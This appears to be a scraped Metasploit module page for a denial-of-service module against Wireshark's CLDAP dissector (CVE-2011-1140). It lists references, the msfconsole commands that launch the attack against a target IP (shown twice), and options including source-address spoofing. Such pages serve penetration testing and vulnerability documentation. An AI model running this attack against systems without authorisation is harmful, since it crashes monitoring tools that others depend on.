Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
Wireshark CLDAP Dissector DOS
This module causes infinite recursion to occur within the CLDAP dissector by sending a specially crafted UDP packet.
Rank
- Normal
Authors
- joernchen <joernchen < joernchen <joernchen [at] phenoelit.de> (Phenoelit) >
References
- CVE-2011-1140
- OSVDB-71552
- http://www.wireshark.org/security/wnpa-sec-2011-04.html
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/wireshark/cldap
msf auxiliary(cldap) > set RHOST [TARGET IP]
msf auxiliary(cldap) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/wireshark/cldap
msf auxiliary(cldap) > set RHOST [TARGET IP]
msf auxiliary(cldap) > run
Module Options
| RHOST | The target address |
| RPORT | The destination port (default: 389) |
| SHOST | This option can be used to specify a spoofed source address |
| CHOST | The local client address |
| CPORT | The local client port |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |